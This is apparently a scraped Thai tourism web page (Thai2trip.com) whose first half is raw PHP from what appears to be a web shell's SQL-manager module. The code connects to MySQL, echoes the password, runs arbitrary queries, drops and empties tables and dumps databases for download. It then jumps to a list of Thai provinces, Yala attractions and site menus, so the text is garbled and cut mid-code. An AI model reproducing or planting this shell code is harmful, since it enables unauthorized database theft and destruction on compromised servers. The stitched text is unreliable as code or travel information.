"; if ($act == "") {$act = $dspact = "ls";} if ($act == "sql") { $sql_surl = $surl."act=sql"; if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} $sql_surl .= "&"; ?>

Attention! SQL-Manager is NOT ready module! Don't reports bugs.

"; if (!$sql_sock) {?>
SQL Manager:
"; if (!$sql_sock) { if (!$sql_server) {echo "NO CONNECTION";} else {echo "
Can't connect
"; echo "".$err."";} } else { $sqlquicklaunch = array(); $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); $sqlquicklaunch[] = array("Logout",$surl."act=sql"); echo "
MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
"; if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} echo "
"; } echo "
i
 • If login is null, login is owner of process.
 • If host is null, host is localhost
 • If port is null, port is 3306 (default)
 •  Please, fill the form:
  UsernamePassword Database 
  HostPORT
  ">Home
  ".htmlspecialchars($sql_db)." ]---
  "; $c = 0; while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "".htmlspecialchars($row[0])." (".$count_row[0].")
  "; mysql_free_result($count); $c++;} if (!$c) {echo "No tables found in database.";} } } else { ?>
  Home

  Please, select database
  "; //Start center panel $diplay = TRUE; if ($sql_db) { if (!is_numeric($c)) {$c = 0;} if ($c == 0) {$c = "no";} echo "
  There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
  "; if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} echo "
  "; $acts = array("","dump"); if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} elseif ($sql_tbl_act == "insert") { if ($sql_tbl_insert_radio == 1) { $keys = ""; $akeys = array_keys($sql_tbl_insert); foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} $values = ""; $i = 0; foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; $sql_act = "query"; $sql_tbl_act = "browse"; } elseif ($sql_tbl_insert_radio == 2) { $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; $result = mysql_query($sql_query) or print(mysql_smarterror()); $result = mysql_fetch_array($result, MYSQL_ASSOC); $sql_act = "query"; $sql_tbl_act = "browse"; } } if ($sql_act == "query") { echo "
  "; if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
  ".$sql_query_error."
  ";} if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} if ((!$submit) or ($sql_act)) {echo "
  "; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "   
  ";} } if (in_array($sql_act,$acts)) { ?>
  Create new table:
   
  Dump DB:
  "> 
  ";} if ($sql_act == "newtbl") { echo ""; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
  "; } else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
  Reason: ".mysql_smarterror();} } elseif ($sql_act == "dump") { if (empty($submit)) { $diplay = FALSE; echo "
  SQL-Dump:

  "; echo "DB: 

  "; $v = join (";",$dmptbls); echo "Only tables (explode \";\") 1: 

  "; if ($dump_file) {$tmp = $dump_file;} else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} echo "File: 

  "; echo "Download:  

  "; echo "Save to file:  "; echo "  1 - all, if empty"; echo "
  "; } else { $diplay = TRUE; $set = array(); $set["sock"] = $sql_sock; $set["db"] = $sql_db; $dump_out = "download"; $set["print"] = 0; $set["nl2br"] = 0; $set[""] = 0; $set["file"] = $dump_file; $set["add_drop"] = TRUE; $set["onlytabs"] = array(); if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} $ret = mysql_dump($set); if ($sql_dump_download) { @ob_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($ret)); header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); echo $ret; exit; } elseif ($sql_dump_savetofile) { $fp = fopen($sql_dump_file,"w"); if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} else { fwrite($fp,$ret); fclose($fp); echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; } } else {echo "Dump: nothing to do!";} } } if ($diplay) { if (!empty($sql_tbl)) { if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); $count_row = mysql_fetch_array($count); mysql_free_result($count); $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); $tbl_struct_fields = array(); while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} $perpage = $sql_tbl_le - $sql_tbl_ls; if (!is_numeric($perpage)) {$perpage = 10;} $numpages = $count_row[0]/$perpage; $e = explode(" ",$sql_order); if (count($e) == 2) { if ($e[0] == "d") {$asc_desc = "DESC";} else {$asc_desc = "ASC";} $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; } else {$v = "";} $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; $result = mysql_query($query) or print(mysql_smarterror()); echo "
  Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
  "; echo "Structure ]   "; echo "Browse ]   "; echo "Dump ]   "; echo "Insert ]   "; if ($sql_tbl_act == "structure") {echo "

  Coming sooon!";} if ($sql_tbl_act == "insert") { if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} if (!empty($sql_tbl_insert_radio)) { } else { echo "

  Inserting row into table:
  "; if (!empty($sql_tbl_insert_q)) { $sql_query = "SELECT * FROM `".$sql_tbl."`"; $sql_query .= " WHERE".$sql_tbl_insert_q; $sql_query .= " LIMIT 1;"; $result = mysql_query($sql_query,$sql_sock) or print("

  ".mysql_smarterror()); $values = mysql_fetch_assoc($result); mysql_free_result($result); } else {$values = array();} echo "
  "; foreach ($tbl_struct_fields as $field) { $name = $field["Field"]; if (empty($sql_tbl_insert_q)) {$v = "";} echo ""; $i++; } echo "
  FieldTypeFunctionValue
  ".htmlspecialchars($name)."".$field["Type"]."

  "; echo "Insert as new row"; if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";} echo "

  "; } } if ($sql_tbl_act == "browse") { $sql_tbl_ls = abs($sql_tbl_ls); $sql_tbl_le = abs($sql_tbl_le); echo "
  "; echo "\"Pages\" "; $b = 0; for($i=0;$i<$numpages;$i++) { if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} echo $i; if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} if (($i/30 == round($i/30)) and ($i > 0)) {echo "
  ";} else {echo " ";} } if ($i == 0) {echo "empty";} echo "
  From:  To:  
  "; echo "
  "; echo ""; echo ""; for ($i=0;$i"; if (empty($e[0])) {$e[0] = "a";} if ($e[1] != $v) {echo "".$v."";} else {echo "".$v."\"".$m."\"";} echo ""; } echo ""; echo ""; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { echo ""; $w = ""; $i = 0; foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} echo ""; $i = 0; foreach ($row as $k=>$v) { $v = htmlspecialchars($v); if ($v == "") {$v = "NULL";} echo ""; $i++; } echo ""; echo ""; } mysql_free_result($result); echo "
  Action
  ".$v.""; echo "\"Delete\" "; echo "\"Edit\" "; echo "

   

  "; } } else { $result = mysql_query("SHOW TABLE STATUS", $sql_sock); if (!$result) {echo mysql_smarterror();} else { echo "
  "; $i = 0; $tsize = $trows = 0; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { $tsize += $row["Data_length"]; $trows += $row["Rows"]; $size = view_size($row["Data_length"]); echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; $i++; } echo ""; echo ""; echo ""; echo "
  Table
  RowsTypeCreatedModifiedSizeAction
   ".$row["Name"]." ".$row["Rows"]."".$row["Type"]."".$row["Create_time"]."".$row["Update_time"]."".$size." \"Empty\"  \"Drop\" \"Insert\" 
  ?
  ".$i." table(s)
  ".$trows."

  
  กรุงเทพฯ
  กระบี่
  กาญจนบุรี
  กาฬสินธุ์
  กำแพงเพชร
  ขอนแก่น
  จันทบุรี
  ฉะเชิงเทรา
  ชลบุรี
  ชัยนาท
  ชัยภูมิ
  ชุมพร
  เชียงราย
  เชียงใหม่
  ตรัง
  ตราด
  ตาก
  นครนายก
  นครปฐม
  นครพนม
  นครราชสีมา
  นครศรีธรรมราช
  นครสวรรค์
  นนทบุรี
  นราธิวาส
  น่าน
  บุรีรัมย์
  ปทุมธานี
  ประจวบคีรีขันธ์
  ปราจีนบุรี
  ปัตตานี
  พระนครศรีอยุธยา
  พะเยา
  พังงา
  พัทลุง
  พิจิตร
  พิษณุโลก
  เพชรบุรี
  เพชรบูรณ์
  แพร่
  ภูเก็ต
  มหาสารคาม
  มุกดาหาร
  แม่ฮ่องสอน
  ยโสธร
  ยะลา
  ร้อยเอ็ด
  ระนอง
  ระยอง
  ราชบุรี
  ลพบุรี
  ลำปาง
  ลำพูน
  เลย
  ศรีสะเกษ
  สกลนคร
  สงขลา
  สตูล
  สมุทรปราการ
  สมุทรสงคราม
  สมุทรสาคร
  สระแก้ว
  สระบุรี
  สิงห์บุรี
  สุโขทัย
  สุพรรณบุรี
  สุราษฎร์ธานี
  สุรินทร์
  หนองคาย
  หนองบัวลำภู
  อ่างทอง
  อำนาจเจริญ
  อุดรธานี
  อุตรดิตถ์
  อุทัยธานี
  อุบลราชธานี


  ::. สถานที่แนะนำจังหวัด ยะลา

  น้ำตกเฉลิมพระเกียรติ ร.๙

  เขตรักษาพันธุ์สัตว์ป่าฮาลา-บาลา

  อุโมงค์ปิยะมิตร

  น้ำตกอินทสร

  บ่อน้ำร้อนเบตง

  นกนางแอ่น

  ตู้ไปรษณีย์ใหญ่ที่สุดในประเทศไทย

  สวนสุดสยาม

  พระมหาธาตุเจดีย์พระพุทธธรรมประกาศ

  น้ำตกบูเก๊ะปิโล (น้ำตกตะวันรัศมี)

  หมู่บ้านจุฬาภรณ์พัฒนา ๙

  หมู่บ้านซาไก
  ดูทั้งหมด  
  
  เมนูหลัก หน้าแรก, ข่าวสาร, สถานที่ท่องเที่ยวแนะนำ, ข้อมูล - แผนที่ , ท่องเที่ยว 76 จังหวัด, สถานที่พัก, ร้านค้า ออนไลน์, รถเช่า, เว็บเพื่อนบ้าน, Site Map
  เมนูเด่น Hot Gallery, Webboard,
  โรงแรม, ที่พัก โรงแรม - ภาคเหนือ, โรงแรม - ภาคอีสาน, โรงแรม - ภาคกลาง, โรงแรม - ภาคตะวันออก, โรงแรม - ภาคใต้, แนะนำโรงแรม - ที่พัก
  เมนูย่อย แลกลิงค์, แนะนำร้านอาหาร, แนะนำรถตู้ - รถเช่า
  ท่องเที่ยว 5 ภาค ภาคเหนือ, ภาคอีสาน, ภาคกลาง, ภาคตะวันออก, ภาคใต้
  ไลฟ์สไตล์ เที่ยวภูเขา, เที่ยวน้ำตก, เที่ยวทะเล - เกาะ
  ผู้สนับสนุน [ ติดต่อลงโฆษนา ]
    
  ขอขอบคุณ ข้อมูลจาก การท่องเที่ยวแห่งประเทศไทย กรมอุทยานแห่งชาติสัตว์ป่าและพันธุ์พืช
  กรมศิลปากร และ จากสถานที่ท่องเที่ยวของภาคเอกชน ที่เอื้อเฟื้อข้อมูล,แผนที่ และ ภาพ

  Copyright (c) 2008 Thai2trip.com. All rights reserved.